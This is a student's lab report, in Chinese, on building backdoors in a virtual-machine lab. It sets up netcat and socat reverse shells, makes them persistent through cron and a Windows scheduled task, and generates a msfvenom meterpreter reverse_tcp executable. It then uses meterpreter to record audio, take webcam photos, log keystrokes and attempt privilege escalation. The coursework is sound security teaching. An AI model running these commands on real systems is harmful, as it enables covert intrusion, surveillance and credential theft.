2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
(1)例举你能想到的一个后门进入到你系统中的可能方式?
在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:任务计划启动
linux:通过cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易。
(4)如何发现自己有系统有没有被安装后门?
通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。
实验前先查看win和linux的IP地址便于后面的实验。
Linux:192.168.199.128
Win7:192.168.199.229
学习ncat的使用
1.Win获得Linux Shell
- Win7打开cmd命令行,在ncat解压目录下,输入
ncat.exe -l -p 5228
对5228
端口进行监听 - 在Linux终端输入
nc 192.168.199.229 5228 -e /bin/sh
反弹连接Win75228
端口
- Win7已获得Linux shell,输入
ls
验证结果
成功
2.Linux获得Win Shell
Linux下打开一个终端,输入
nc -l -p 5228
对5228
端口进行监听在Win7命令行输入
ncat.exe -e cmd.exe 192.168.199.128 5228
反弹连接Linux5228
端口
Linux已获得Win7 shell,输入
dir
验证结果
成功
3.使用nc传输信息
Win7命令行输入
ncat.exe -l 5228
监听5228
端口Linux终端输入
nc 192.168.199.229 5228
反弹连接Win75228
端口
建立连接后可互传信息
4.使用nc传输文件
Win7命令行输入
ncat.exe -l 5228 > 2.txt
监听5228
端口,并设置收到的文件重定向保存到2.txt
Linux终端输入
nc 192.168.199.229 5228 < 1.txt
反弹连接Win75228
端口
Win7可收到Linux发来的文件。
实验内容
任务一:使用netcat获取主机操作Shell,cron启动
1、设定cron
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
- Win7中打开对端口
5228
端口的监听。
ncat.exe -l -p 5228
- Linux下使用
crontab -e
指令增加一条定时任务,-e
表示编辑 - 选择
3
,即编辑器。
根据m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
的格式添加最后一行33 * * * * /bin/netcat 192.168.199.229 5228 -e /bin/sh
保存退出
- 结果验证:Win7得到Linux Shell
任务二:使用socat获取主机操作Shell, 任务计划启动
1、新建任务计划
- 原理: 在主控机的nc打开对5228端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行
ncat.exe -e cmd.exe 192.168.199.128 5228
,从而反弹连接到Linux。即Linux得到Win7 shell。
新建触发器:当锁定任何用户的工作站时
新建操作:
启动程序:socat所在路径\socat.exe
添加参数:tcp-listen:5228 exec:cmd.exe,pty,stderr
2、锁定计算机,让该任务计划运行。再次唤醒计算机,可以看到刚新建的任务已启动,
3、Linux终端输入socat - tcp:192.168.199.229:5228
,结果验证:Linux得到了Win7 shell
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Linux终端执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 199.128 LPORT=5228 -f exe > 20165228_backdoor.exe
生成后门程序20165228_backdoor.exe
Win7下执行
ncat.exe -l 5228 > 20165228_backdoor.exe
监听5228
端口,并将收到的文件重定向保存到20165228_backdoor.exe
Linux终端执行
nc 192.168.199.229 5228 < 20165228_backdoor.exe
反弹连接Win7并传输文件20165228_backdoor.exe
Linux终端执行
msfconsole
命令,并设置好IP地址和端口号
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
执行监听
Win7运行后门程序
Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic
录制一段音频
webcam_snap
使用摄像头拍照
keyscan_start
开始记录击键,keyscan_dump
读取记录
screenshot
进行截屏
getuid
查看当前用户并执行getsysyem
进行提权操作
实验中遇到的问题
1、我尝试过用Linux监听端口,Win7反弹连接Linux却提示由于目标计算机积极拒绝,无法连接
解决:尚未解决
2、在最后getsystem
获取权限时失败
解决:在尝试一些博客中的方法后,发现好像还是不行,但是了解到了msf使用的是自带的提权方法,只尝试了4个payload,所以大部分都会失败。
实验感想
- 此次实验的内容让我十分感兴趣,仅仅通过一些简单的指令就可以实现shell权限的获取,也让我明白了信息安全的重要性,特别是在尝试录音、拍照、截屏等操作后,让我认识到信息的泄露太可怕了。这让我更加想要学好网络攻防这门课,深入了解和掌握这些技能。
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- 德邦总管 修改oracle数据库用户密码的方法
WIN+R打开运行窗口,输入cmd进入命令行: 输入sqlplus ,输入用户名,输入口令(如果是超级管理员SYS的话需在口令之后加上as sysdba)进入sql命令行: 连接成功后,输入“s ...
- 用html和css制作奥运五环
<html><head><meta charset="utf-8"> <style>.circle1,.circle2,.circl ...
- springboot学习小记
思维导图:https://www.edrawsoft.cn/viewer/public/s/72a06689197636 1.springboot是一个快速整合第三方框架,简化XML配置完全采用注解化 ...
- JS数组映射详解
现在这里占个坑位,免的忘了,需要整理一下最近的内容: 1.数组映射的使用 2.微信分享功能详解 3.jq自己封装 4.HTML的富文本应用
- java判断一个字符串是否为空,isEmpty和isBlank的区别
转载于:https://blog.csdn.net/liusa825983081/article/details/78246792 实际应用中,经常会用到判断字符串是否为空的逻辑 比较简单的就是用 S ...
- EVE-NG简单入门介绍
此篇文章简单的介绍下模拟器EVE-NG的使用,具体包括Dynamips设备导入与运行,IOL设备的导入与运行,QEMU设备的导入与运行,客户端软件的安装,物理网络与虚拟网络的结合等. 一.导入镜像 D ...
- 面向对象DAO模式
DAO模式编写数据访问层代码步骤? 1. 接口 增.删.改.查的方法 方法的返回类型为泛型集合 Int rows=select语句的条数 If(rows>0) 方法的返回类型为泛型集合 If( ...
- 较为复杂的实现Parcelable的子类--推荐Android中使用
2017-08-14 21:23:34 一个较为复杂的Parcelable实现类 public class CommentShareBean implements Parcelable { /** * ...
- rtp传输音视频(纯c代码)
参考链接: 1. PES,TS,PS,RTP等流的打包格式解析之RTP流 https://blog.csdn.net/appledurian/article/details/73135343 2. ...
- java上传图片
-- jsp 一定要加上enctype="multipart/form-data" method="post" 不加无法辨别是否是上传表单的数据 <fo ...